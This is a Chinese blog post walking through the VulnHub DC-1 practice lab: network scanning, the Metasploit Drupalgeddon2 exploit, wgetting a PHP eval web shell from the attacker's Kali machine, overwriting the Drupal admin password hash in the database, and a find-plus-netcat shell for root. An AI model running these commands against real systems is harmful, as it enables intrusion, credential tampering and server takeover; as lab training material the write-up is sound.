

<!DOCTYPE html>
<html lang="zh-CN">

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>DC:1渗透测试 - TXXJ</title>
  <meta name="apple-mobile-web-app-capable" content="yes" />
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta name="google" content="notranslate" />

  
  
  <meta name="description" content="DC1 渗透测试实验环境：靶机：DC:1 点击下载
攻..."> 
  
  <meta name="author" content="TXXJ"> 

  
    <link rel="icon" href="/images/icons/favicon-16x16.png" type="image/png" sizes="16x16">
  
  
    <link rel="icon" href="/images/icons/favicon-32x32.png" type="image/png" sizes="32x32">
  
  
    <link rel="apple-touch-icon" href="/images/icons/apple-touch-icon.png" sizes="180x180">
  
  
    <meta rel="mask-icon" href="/images/icons/stun-logo.svg" color="#333333">
  
  
    <meta rel="msapplication-TileImage" content="/images/icons/favicon-144x144.png">
    <meta rel="msapplication-TileColor" content="#000000">
  

  
<link rel="stylesheet" href="/css/style.css">


  
  
<link rel="stylesheet" href="//at.alicdn.com/t/font_1445822_h1619vhl1nr.css">

  

  
  
  
<link rel="stylesheet" href="https://cdn.bootcss.com/fancybox/3.5.7/jquery.fancybox.min.css">

  

  
  
  
<link rel="stylesheet" href="https://cdn.bootcss.com/highlight.js/9.18.1/styles/xcode.min.css">

  

  <script>
    var CONFIG = window.CONFIG || {};
    var ZHAOO = window.ZHAOO || {};
    CONFIG = {
      isHome: false,
      fancybox: true,
      pjax: true,
      lazyload: {
        enable: true,
        loadingImage: '',
      },
      donate: {
        enable: true,
        alipay: 'https://pic.izhaoo.com/alipay.jpg',
        wechat: 'https://pic.izhaoo.com/wechat.jpg'
      },
      motto: {
        api: '',
        default: '我在开了灯的床头下，想问问自己的心啊。'
      },
      galleries: {
        enable: true
      },
      fab: {
        enable: true,
        alwaysShow: false
      },
      carrier: {
        enable: true
      },
      daovoice: {
        enable: true
      }
    }
  </script>

  

  
<meta name="generator" content="Hexo 5.2.0"></head>
<body class="lock-screen">
  <div class="loading"></div>
  


<nav class="navbar">
  <div class="left"></div>
  <div class="center">DC:1渗透测试</div>
  <div class="right">
    <i class="iconfont iconmenu j-navbar-menu"></i>
  </div>
</nav>

  <nav class="menu">
  <div class="menu-wrap">
    <div class="menu-close">
      <i class="iconfont iconbaseline-close-px"></i>
    </div>
    <ul class="menu-content">
      
      
      
      
      <li class="menu-item"><a href="/ " class="underline"> 首页</a></li>
      
      
      
      
      <li class="menu-item"><a href="/galleries " class="underline"> 相册</a></li>
      
      
      
      
      <li class="menu-item"><a href="/archives " class="underline"> 归档</a></li>
      
      
      
      
      <li class="menu-item"><a href="/tags " class="underline"> 标签</a></li>
      
      
      
      
      <li class="menu-item"><a href="/categories " class="underline"> 分类</a></li>
      
      
      
      
      <li class="menu-item"><a href="/about " class="underline"> 关于</a></li>
      
    </ul>
    <div class="menu-copyright"><p>Powered by <a target="_blank" href="https://hexo.io">Hexo</a>  |  Theme - <a target="_blank" href="https://github.com/izhaoo/hexo-theme-zhaoo">zhaoo</a></p></div>
  </div>
</nav>
  <main id="main">
  <div class="container" id="container">
    <article class="article">
  <div class="wrap">
    <section class="head">
  <img   class="lazyload" data-original="/backgroud.png" src=""  draggable="false">
  <div class="head-mask">
    <h1 class="head-title">DC:1渗透测试</h1>
    <div class="head-info">
      <span class="post-info-item"><i class="iconfont iconcalendar"></i>November 29, 2020</span
        class="post-info-item">
      
      <span class="post-info-item"><i class="iconfont iconfont-size"></i>1158</span>
    </div>
  </div>
</section>
    <section class="main">
      <section class="content">
        <h1 id="DC1-渗透测试"><a href="#DC1-渗透测试" class="headerlink" title="DC1 渗透测试"></a>DC1 渗透测试</h1><h2 id="实验环境："><a href="#实验环境：" class="headerlink" title="实验环境："></a>实验环境：</h2><p>靶机：DC:1 <a target="_blank" rel="noopener" href="https://download.vulnhub.com/dc/DC-1.zip">点击下载</a></p>
<p>攻击机：kali,win10</p>
<h2 id="实验步骤："><a href="#实验步骤：" class="headerlink" title="实验步骤："></a>实验步骤：</h2><ol>
<li>安装靶机</li>
<li>信息收集</li>
<li>漏洞利用</li>
<li>提权</li>
</ol>
<h2 id="实验开始："><a href="#实验开始：" class="headerlink" title="实验开始："></a>实验开始：</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs plain">下载靶机<br>安装靶机<br>使用靶机OVA文件在vmvara安装<br>修改靶机网络<br>进入单用户模式重启靶机<br></code></pre></td></tr></table></figure>

<h5 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h5><figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs angelscript">ip收集<br>arp-scan -l;<br>nmap -sV <span class="hljs-number">192.168</span><span class="hljs-number">.10</span><span class="hljs-number">.18</span><br></code></pre></td></tr></table></figure>

<h5 id="指纹查询"><a href="#指纹查询" class="headerlink" title="指纹查询"></a>指纹查询</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">使用浏览器插件wappalyzer查cms<br></code></pre></td></tr></table></figure>

<p><img   class="lazyload" data-original="/DC-1%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/1.png" src=""  alt="image"></p>
<h3 id="相关漏洞搜寻"><a href="#相关漏洞搜寻" class="headerlink" title="相关漏洞搜寻"></a>相关漏洞搜寻</h3><figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ebnf"><span class="hljs-attribute">msfconsolesearch drupal</span><br></code></pre></td></tr></table></figure>
<h3 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs routeros">msf攻击<br>use exploit/unix/webapp/drupal_drupalgeddon2<br><span class="hljs-builtin-name">set</span> <span class="hljs-attribute">RHOST</span>=192.168.10.18<br>explit<br>shell<br>python -c <span class="hljs-string">&quot;import pty;pty.spwan(&#x27;/bin/sh&#x27;)&quot;</span><br></code></pre></td></tr></table></figure>
<h5 id="上传PHP木马"><a href="#上传PHP木马" class="headerlink" title="上传PHP木马"></a>上传PHP木马</h5><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs php">先在kali上启动apache2<br>vim /<span class="hljs-keyword">var</span>/www/test.txt<br>    <span class="hljs-meta">&lt;?php</span> <span class="hljs-keyword">eval</span>($_POST[<span class="hljs-string">&#x27;key&#x27;</span>]);<span class="hljs-meta">?&gt;</span><br>在会到msf中<br>wget http:<span class="hljs-comment">//192.168.10.17/test.txt</span><br>cp test.txt test.php<br></code></pre></td></tr></table></figure>
<h5 id="蚁剑链接"><a href="#蚁剑链接" class="headerlink" title="蚁剑链接"></a>蚁剑链接</h5><p><img   class="lazyload" data-original="/DC-1%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/2.png" src=""  alt="image"></p>
<h5 id="查看配置文件"><a href="#查看配置文件" class="headerlink" title="查看配置文件"></a>查看配置文件</h5><figure class="highlight gcode"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs gcode">目录中有一个fla<span class="hljs-name">g1.</span>txt<br>在配置文件中有一个fla<span class="hljs-name">g2</span><br>根据提示访问数据库<br></code></pre></td></tr></table></figure>
<h5 id="查看数据库"><a href="#查看数据库" class="headerlink" title="查看数据库"></a>查看数据库</h5><figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">利用蚁剑可以直接连接可以直接看到<span class="hljs-keyword">user</span>表<br>得知<span class="hljs-keyword">password</span>被加密，如果需要改密码就要进行同样的加密<br></code></pre></td></tr></table></figure>
<h5 id="修改password-hash-sh"><a href="#修改password-hash-sh" class="headerlink" title="修改password-hash.sh"></a>修改password-hash.sh</h5><figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs angelscript">在蚁剑中执行的时候产生了报错报错的行在<span class="hljs-number">83</span>，<span class="hljs-number">84</span>行<br>我把文件的路径改后就能正常执行了<br></code></pre></td></tr></table></figure>
<h5 id="执行password-hash-sh"><a href="#执行password-hash-sh" class="headerlink" title="执行password-hash.sh"></a>执行password-hash.sh</h5><figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs jboss-cli"><span class="hljs-string">./password-hash.sh</span> root<br></code></pre></td></tr></table></figure>
<h5 id="修改数据数据"><a href="#修改数据数据" class="headerlink" title="修改数据数据"></a>修改数据数据</h5><p>在执行过脚本之后就产生了一串hash值可以直接添加进表中</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs routeros">update<span class="hljs-built_in"> users </span><span class="hljs-builtin-name">set</span> password = <span class="hljs-string">&#x27;$S$DOjcjhOiiHtadIneTwIvHAHacQ2dXVvF9xG8Mi8.h8dLGndJMZJY&#x27;</span> where <span class="hljs-attribute">uid</span>=<span class="hljs-string">&#x27;1&#x27;</span>;<br></code></pre></td></tr></table></figure>

<p><img   class="lazyload" data-original="/DC-1%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/3.png" src=""  alt="image"></p>
<h5 id="登录主页查看flag3"><a href="#登录主页查看flag3" class="headerlink" title="登录主页查看flag3"></a>登录主页查看flag3</h5><p><img   class="lazyload" data-original="/DC-1%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/4.png" src=""  alt="image"></p>
<figure class="highlight arduino"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs arduino">主机信息收集进入<span class="hljs-built_in">home</span>得到flag4<br>cd /<span class="hljs-built_in">home</span>/flag4<br>cat fla*<br></code></pre></td></tr></table></figure>

<p><img   class="lazyload" data-original="/DC-1%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/5.png" src=""  alt="image"></p>
<h5 id="提权-拿最终flag"><a href="#提权-拿最终flag" class="headerlink" title="提权,拿最终flag"></a>提权,拿最终flag</h5><figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs yaml"><span class="hljs-string">使用find+netcat</span> <br><span class="hljs-string">提权蚁剑：</span>    <br><span class="hljs-string">find</span> <span class="hljs-string">/</span> <span class="hljs-string">-exec</span> <span class="hljs-string">netcat</span> <span class="hljs-string">-lvp</span> <span class="hljs-number">5555</span> <span class="hljs-string">-e</span> <span class="hljs-string">&#x27;/bin/sh&#x27;</span><span class="hljs-string">\;</span><br><span class="hljs-attr">kali:</span>    <span class="hljs-string">nc</span> <span class="hljs-number">192.168</span><span class="hljs-number">.10</span><span class="hljs-number">.18</span> <span class="hljs-number">5555</span>    <br>    <span class="hljs-string">cd</span> <span class="hljs-string">/root/</span>    <br>    <span class="hljs-string">ls</span>    <br>    <span class="hljs-string">cat</span> <span class="hljs-string">thi*</span><br></code></pre></td></tr></table></figure>

<p><img   class="lazyload" data-original="/DC-1%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/6.png" src=""  alt="image"></p>
<h3 id="——实验结束——"><a href="#——实验结束——" class="headerlink" title="——实验结束——"></a>——实验结束——</h3>
      </section>
      <section class="extra">
        
        <ul class="copyright">
  
  <li><strong>本文作者：</strong>TXXJ</li>
  <li><strong>本文链接：</strong><a href="https://txxj.github.io/DC-1%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/index.html">https://txxj.github.io/DC-1%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/index.html</a></li>
  <li><strong>版权声明：</strong>本博客所有文章均采用<a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh"
      rel="external nofollow" target="_blank"> BY-NC-SA </a>许可协议，转载请注明出处！</li>
  
</ul>
        
        
        <section class="donate">
  <div class="qrcode">
    <img   class="lazyload" data-original="https://pic.izhaoo.com/alipay.jpg" src="" >
  </div>
  <div class="icon">
    <a href="javascript:;" id="alipay"><i class="iconfont iconalipay"></i></a>
    <a href="javascript:;" id="wechat"><i class="iconfont iconwechat-fill"></i></a>
  </div>
</section>
        
        
  <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/kali/" rel="tag">kali</a></li></ul>

        
<nav class="nav">
  
    <a href="/DC-2%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"><i class="iconfont iconleft"></i>DC-2渗透测试</a>
  
  
    <a href="/Rinetd%E8%81%94%E5%8A%A8kippo%E5%AE%9E%E9%AA%8C/">Rinetd联动kippo实验<i class="iconfont iconright"></i></a>
  
</nav>

      </section>
      
      <section class="comments">
  
  <div class="btn" id="comments-btn">查看评论</div>
  
  
</section>
      
    </section>
  </div>
</article>
  </div>
</main>
  <footer class="footer">
  <div class="footer-social">
    
    
    
    
    
    <a href="tencent://message/?Menu=yes&uin=894519210 " target="_blank" onMouseOver="this.style.color= '#12B7F5'"
      onMouseOut="this.style.color='#33333D'">
      <i class="iconfont footer-social-item  iconQQ "></i>
    </a>
    
    
    
    
    
    <a href="javascript:; " target="_blank" onMouseOver="this.style.color= '#09BB07'"
      onMouseOut="this.style.color='#33333D'">
      <i class="iconfont footer-social-item  iconwechat-fill "></i>
    </a>
    
    
    
    
    
    <a href="https://www.instagram.com/izhaoo/ " target="_blank" onMouseOver="this.style.color= '#DA2E76'"
      onMouseOut="this.style.color='#33333D'">
      <i class="iconfont footer-social-item  iconinstagram "></i>
    </a>
    
    
    
    
    
    <a href="https://github.com/izhaoo " target="_blank" onMouseOver="this.style.color= '#24292E'"
      onMouseOut="this.style.color='#33333D'">
      <i class="iconfont footer-social-item  icongithub-fill "></i>
    </a>
    
    
    
    
    
    <a href="mailto:izhaoo@163.com " target="_blank" onMouseOver="this.style.color='#FFBE5B'"
      onMouseOut="this.style.color='#33333D'">
      <i class="iconfont footer-social-item  iconmail"></i>
    </a>
    
  </div>
  <div class="footer-copyright"><p>Powered by <a target="_blank" href="https://hexo.io">Hexo</a>  |  Theme - <a target="_blank" href="https://github.com/izhaoo/hexo-theme-zhaoo">zhaoo</a></p></div>
</footer>
  
      <div class="fab fab-plus">
    <i class="iconfont iconplus"></i>
  </div>
  
  <div class="fab fab-daovoice">
    <i class="iconfont iconcomment"></i>
  </div>
  
  <div class="fab fab-up">
    <i class="iconfont iconcaret-up"></i>
  </div>
  
</body>


<script src="https://cdn.bootcss.com/jquery/3.4.1/jquery.min.js"></script>






<script src="https://cdn.bootcdn.net/ajax/libs/jquery.lazyload/1.9.1/jquery.lazyload.min.js"></script>






<script src="https://cdn.bootcss.com/fancybox/3.5.7/jquery.fancybox.min.js"></script>






<script src="https://cdn.bootcss.com/jquery.pjax/2.0.1/jquery.pjax.min.js"></script>




<script src="/js/utils.js"></script>
<script src="/js/modules.js"></script>
<script src="/js/zui.js"></script>
<script src="/js/script.js"></script>





<script>
  (function (i, s, o, g, r, a, m) {
    i["DaoVoiceObject"] = r;
    i[r] = i[r] || function () {
      (i[r].q = i[r].q || []).push(arguments)
    }, i[r].l = 1 * new Date();
    a = s.createElement(o), m = s.getElementsByTagName(o)[0];
    a.async = 1;
    a.src = g;
    a.charset = "utf-8";
    m.parentNode.insertBefore(a, m)
  })(window, document, "script", ('https:' == document.location.protocol ? 'https:' : 'http:') +
    "//widget.daovoice.io/widget/0f81ff2f.js", "daovoice")
  daovoice('init', {
    app_id: "abcdefg"
  }, {
    launcher: {
      disableLauncherIcon: true,
    },
  });
  daovoice('update');
</script>



<script>
  (function () {
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
      bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    } else {
      bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
  })();
</script>


<script>
  var _hmt = _hmt || [];
  (function () {
    var hm = document.createElement("script");
    hm.src = "https://hm.baidu.com/hm.js?4c204d8bc027a0455b5fc642ac334ca8";
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(hm, s);
  })();
</script>










</html>